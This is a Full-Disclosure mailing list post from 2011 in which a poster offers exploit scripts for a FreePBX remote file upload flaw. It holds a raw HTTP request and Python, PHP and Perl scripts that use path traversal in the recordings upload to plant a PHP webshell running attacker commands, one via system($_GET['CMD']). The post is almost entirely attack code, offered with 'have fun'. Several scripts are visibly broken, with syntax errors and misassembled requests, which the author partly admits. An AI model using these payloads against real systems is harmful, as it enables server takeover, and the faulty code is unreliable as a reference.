ehhhh .... php exploit code has a small bugs in it :P sorry... i just woke and should have looked... just look at part1 and part2 :) it is pretty simple to fix...
also when uploading, you create your own /folder/ , using this method anyhow.. On 10 June 2011 08:59, -= Glowing Doom =- <[email protected]> wrote: > Hello... > I wrote a PoC code, for similar bug in this application, about 3months > ago... unfortunately, i did not bother to put it on here because well, it > was nothing much.. but since this 'admin' module has appeared, i will add my > codes to the thing...: this needs for PBX to 'record' ,notsure if an admin > module is needed..it seems to ONLY look for the recordings... anyhow have > fun.. admin i believe :)... nice try to find the sploit guys, i have only > posted it on my blogs and pastebin about 400times in the past 4months... i > guess i will put it here next time.. here is some codes for you..: > ------------------------------------------------------------------------------------------------------- > PoC > The HTTP request below illustrates the upload of a phpshell:: > > POST /admin/config.php HTTP/1.1 > Host: 10.10.1.3 > User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; > en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > Accept-Language: en-us,en;q=0.5 > Accept-Encoding: gzip,deflate > Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 > Keep-Alive: 300 > Proxy-Connection: keep-alive > Referer: http://10.10.1.3/admin/config.php > Cookie: ARI=cookieValue; PHPSESSID=cookieValue > Authorization: Basic base64auth > Content-Type: multipart/form-data; > boundary=---------------------------5991806838789183981588991120 > Content-Length: 116089 > > -----------------------------5991806838789183981588991120 > Content-Disposition: form-data; name="display" > > recordings > -----------------------------5991806838789183981588991120 > Content-Disposition: form-data; name="action" > > recordings_start > -----------------------------5991806838789183981588991120 > Content-Disposition: form-data; name="usersnum" > > ../../../../../var/www/html/admin/SpiderLabs > -----------------------------5991806838789183981588991120 > Content-Disposition: form-data; name="ivrfile"; filename="webshell.php" > Content-Type: application/octet-stream > <?php > /* WebShell code goes here */ > ?> > -----------------------------5991806838789183981588991120-- > > OK SO... > > In python form: > #!/usr/bin/env python > import urllib, re, os, httplib, urllib2, time, socket, getopt, sys > > host = $host > port = 80 > > s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n') > s.connectHTTP((host,port)) > s.send( > 'POST /admin/config.php HTTP/1.1\r\n' > 'Host: ' + host + '\r\n' > 'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US; > rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n' > 'Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n' > 'Accept-Language: en-us,en;q=0.5\r\n' > 'Accept-Encoding: gzip,deflate\r\n' > 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n' > 'Keep-Alive: 300\r\n' > 'Proxy-Connection: keep-alive\r\n' > 'Referer: http://' + host + '/admin/config.php\r\n' > 'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n' > 'Authorization: Basic base64auth\r\n') > 'Content-Type: multipart/form-data;\r\n' > 'boundary=---------------------------5991806838789183981588991120\r\n' > 'Content-Type: multipart/form-data;\r\n' > 'boundary=---------------------------5991806838789183981588991120\r\n' > 'Content-Length: 116089\r\n' > '\r\n' > '-----------------------------5991806838789183981588991120\r\n' > 'Content-Disposition: form-data; name="display"\r\n' > '\r\n' > 'recordings\r\n' > '-----------------------------5991806838789183981588991120\r\n' > 'Content-Disposition: form-data; name="action"\r\n' > '\r\n' > 'recordings_start\r\n' > '-----------------------------5991806838789183981588991120\r\n' > 'Content-Disposition: form-data; name="usersnum"\r\n' > '\r\n' > '../../../../../var/www/html/admin/zmeu.php\r\n' > '-----------------------------5991806838789183981588991120\r\n' > 'Content-Disposition: form-data; name="ivrfile"; filename="zmeu.php"\r\n' > 'Content-Type: application/octet-stream\r\n' > '\r\n' > '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n' > '-----------------------------5991806838789183981588991120--\r\n' > > and... > > IN php: > > <?php > echo "\n\n"; > echo > "+-------------------------------------------------------------------------+\r\n"; > echo "| FreePBX 2o11 Remote File Upload Exploit |\r\n"; > echo "| Usage: php exploit.php site.com |\r\n"; > echo > "+-------------------------------------------------------------------------+\r\n"; > echo "\n"; > echo "[+] Code to write to the file (Ex. id;uname -a):\r\n\n"; > $code = trim(fgets(STDIN)); > $socket = @fsockopen($argv[1], 80, $eno, $estr, 10); > if(!$socket) { > die("[-] Couldnt connect to: ".$argv[1].". Operation aborted."); > } > $part1 = "POST /admin/config.php HTTP/1.1\r\n"; > $part1 .= "Host: " . $argv[1] . "\r\n"; > $part1 .= "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X > 10.4.6)\r\n"; > $part1 .= "Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; > $part1 .= "Accept-Language: en-us,en;q=0.5\r\n"; > $part1 .= "Accept-Encoding: gzip,deflate\r\n"; > $part1 .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; > $part1 .= "Connection: keep-alive\r\n"; > $part1 .= "Keep-Alive: 300\r\n"; > $part1 .= "Proxy-Connection: keep-alive\r\n"; > $part1 .= "Referer: http://10.1.1.1/admin/config.php\r\n";; > $part1 .= "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n"; > $part1 .= "Authorization: Basic base64auth\r\n"; > $part1 .= "Content-Type : multipart/form-data;\r\n"; > $part2 = > "boundary=-----------------------------5991806838789183981588991120--\r\n"; > $part1 .= "Content-Type : multipart/form-data;\r\n"; > $part2 = > "boundary=-----------------------------5991806838789183981588991120--\r\n"; > $part2 = "Content-Length: 116089\r\n"; > $part2 .= "\r\n"; > $part2 .= > "-----------------------------5991806838789183981588991120\r\n"; > $part2 .= "Content-Disposition: form-data; name=\"display\"\r\n"; > $part2 .= "\r\n"; > $part2 .= "recordings\r\n"; > $part2 .= > "---------------------------5991806838789183981588991120\r\n"; > $part2 .= "Content-Disposition: form-data; name=\"action\"\r\n"; > $part2 .= "\r\n"; > $part2 .= "recordings_start\r\n"; > $part2 .= > "---------------------------5991806838789183981588991120\r\n"; > $part2 .= "Content-Disposition: form-data; > name=\"usersnum\"\r\n"; > $part2 .= "\r\n"; > $part2 .= "Content-Disposition: form-data; > name=\"../../../../../var/www/html/admin/xd\"\r\n"; > $part2 .= > "---------------------------5991806838789183981588991120\r\n"; > $part2 .= "Content-Disposition: form-data; name=\"ivrfile\"; > filename=\"shell.php\"\r\n"; > $part2 .= "Content-Type: application/octet-stream\r\n"; > $part2 .= "\r\n"; > $part2 .= "<?php echo \'<pre>\' + system(\'$code\') + \'</pre>\'; > ?>\r\n"; > $part2 .= > "-----------------------------5991806838789183981588991120--\r\n"; > $part1 .= $part2; > fwrite($socket, $part1); > echo "[!] Check the upload folder (/var/www/html/admin/xd) .."; > } else { > echo "\n\n"; > echo "+---------------------------------------------------+\r\n"; > echo "| Usage: php exploit.php site.com |\r\n"; > echo "+---------------------------------------------------+\r\n"; > echo "\n\n"; > } > ?> > > and in perl.. > > #!/usr/bin/perl > use IO::Socket::INET; > use Crypt::SSLeay; > use Net::SSL; > > sub usage { > print "perl $0 <Host> <Cmd>\n"; > exit(1); > } > my($host, $cmd) = @ARGV or usage(); > print "[+] Connecting to host...\n"; > my $sock = IO::Socket::INET->new(Proto => 'tcp',PeerAddr => $host,PeerPort > => 80,Timeout => 10) or die "[-] Connect error..\n"; > if(!sock) { > print "[-] Non-SSL PBX NOT HERE!\n"; > exit(-1); > else { > $sock = Net::SSL->new(Proto => 'tcp',PeerAddr => $host,PeerPort => > 443,Timeout => 10) or die "[-] Connect error..\n"; > print "[-] SSL PBX NOT HERE!\n"; > exit(-1); > } > print "[+] Connected.. Sending Buffer\n"; > my $temp= > "POST /admin/config.php HTTP/1.1\n". > "Host: $host:80/\n". > "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4.6)\n". > "Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n". > "Accept-Language: en-us,en;q=0.5\n". > "Accept-Encoding: gzip,deflate\n". > "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n". > "Keep-Alive: 300\n". > "Proxy-Connection: keep-alive\n". > "Referer: http://$host/admin/config.php\n";. > "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\n". > "Authorization: Basic base64auth\n". > "Connection: keep-alive\n". > "Content-Type : multipart/form-data;\n". > "---------------------------5991806838789183981588991120\n". > "Content-Length: 116089\n". > "\n". > "Content-Disposition: form-data; name=\"display\"\n". > "recordings\n". > "\n". > "---------------------------5991806838789183981588991120\n". > "Content-Disposition: form-data; name=\"action\"\n". > "recordings_start\n". > "\n". > "---------------------------5991806838789183981588991120\n". > "Content-Disposition: form-data; name=\"usersnum\"\n". > "\n". > "---------------------------5991806838789183981588991120\n". > "Content-Disposition: form-data; > name=\"../../../../../var/www/html/admin/xd\"\n". > "Content-Disposition: form-data; name="ivrfile"; filename="shell.php\n". > "Content-Type: application/octet-stream\n". > "\n". > "<?php ". $cmd ." ?>\n". > "-----------------------------5991806838789183981588991120--\n\n"; > > print "[+] Sent file 'shell.php' to act as webshell ..\n"; > my $buffer_size=length($temp); > $temp; > my $answer=0; > $buffer=~s/siz/$buffer_size/g; > print $sock $buffer; > if ($sock) { > print "[+] Buffer sent..running command: $cmd ..\n"; > while ($answer=<$sock>) { > print $answer; > print results "[!] Server reply: $answer ..\n"; > } > } > } > > have fun! Perl one is abit rough.. > dru > > xd @ #haxNET @ Efnet > > (National LULZ day is here!) > > And for those guys who 'exploited' it... this PoC was released like 3months > ago... what the hell are yu guiys on about, and where is even a HEADER > showing explotation :S seems you have started a group but forgot to check > this for previous bugs :) hehe... nomatter, it is now debugged for you. > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
